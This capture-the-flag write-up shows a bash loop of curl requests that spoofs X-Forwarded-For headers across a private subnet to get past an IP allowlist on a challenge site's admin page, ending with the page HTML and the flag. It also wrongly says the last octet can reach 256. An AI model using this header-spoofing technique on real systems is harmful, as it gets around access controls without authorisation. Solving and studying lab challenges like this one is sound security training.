500pts
Access the site at https://cfta-wh01.allyourbases.co and find a way to get the flag from the CMS.
First, scan for directories. I used dirsearch, which uncovered two interesting pages:
admin.html(0 bytes)readme.txt
If you visit readme.txt, you get this message:
To use the CMS make sure to visit /admin.html from allowed IPs on the local network.
Note: Tell engineering to stop moving the subnet from 192.168.0.0/24
We can infer two things:
- Only certain IPs on the local network can access /admin.html
- The local network subnet is
192.168.0.0/24
From this, we can determine that in order to access /admin.html, we need to spoof with an IP in the range of 192.168.0.0/24 (ex: 192.168.0.3; the last digit can be any number from 0 to 256).
I wrote a trusty bash script to do the job:
for i in {0..256}
do
echo "IP: 192.168.0.$i"
curl -i -H "X-Forwarded-For: 192.168.0.$i" https://cfta-wh01.allyourbases.co/admin.html
doneNote: This really isn't the most efficient way, and I just used
grepafter to find the successful IP, which was 192.168.0.62
Success! We're on the admin page and we've got the flag.
<!DOCTYPE html>
<html lang="en">
<head>
<title>My Blog</title>
<link rel="stylesheet" href="mysite.css">
</head>
<body>
<div class="main">
<div class="center">
<div class="header">
<h1>Admin</h1>
</div>
<div class="content flag">
<h2>Flag</h2>
iPSpooFinGWiThHopHeaDers91918
</div>
<div class="footer">
Powered By: mycustomcms 2021
</div>
</div>
</div>
</body>
</html>Flag: iPSpooFinGWiThHopHeaDers91918